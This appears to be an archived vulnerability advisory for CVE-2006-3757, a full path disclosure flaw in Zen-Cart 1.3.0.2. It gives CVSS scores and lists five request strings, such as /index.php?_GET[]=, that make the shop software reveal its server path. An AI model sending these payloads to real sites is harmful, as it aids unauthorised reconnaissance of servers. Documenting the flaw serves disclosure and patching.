Zen-Cart 1.3.0.2 Full Path Disclosure

2006.07.25

Credit: o y 6 hotmail com

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-3757

CWE: CWE-Other

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

Zen-Cart 1.3.0.2

En:

Zen-Cart .. E-commerce PHP Program -> This Bug Can Tell U Where The Program @ Server

Ar:

&#1575;&#1604;&#1600; &#1586;&#1610;&#1606; &#1603;&#1575;&#1585;&#1578; .. &#1576;&#1585;&#1606;&#1575;&#1605;&#1580; &#1578;&#1580;&#1575;&#1585;&#1577; &#1575;&#1604;&#1603;&#1578;&#1585;&#1608;&#1606;&#1610;&#1577; &#1576;&#1605;&#1585;&#1605;&#1580; &#1576;&#1575;&#1604;&#1600; &#1576;&#1610; &#1575;&#1578;&#1588; &#1576;&#1610; &#1608; &#1575;&#1604;&#1579;&#1594;&#1585;&#1607; &#1607;&#1584;&#1607; &#1578;&#1582;&#1576;&#1585;&#1603; &#1576;&#1605;&#1587;&#1575;&#1585; &#1575;&#1604;&#1576;&#1585;&#1606;&#1575;&#1605;&#1580; &#1593;&#1604;&#1609; &#1575;&#1604;&#1587;&#1610;&#1585;&#1601;&#1585;

Full Path Disclosure :-

/index.php?_GET[]=

/index.php?_SESSION[]=

/index.php?_POST[]=

/index.php?_COOKIE[]=

/index.php?_SESSION[]=

/------------------------------------------/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zen-Cart 1.3.0.2 Full Path Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.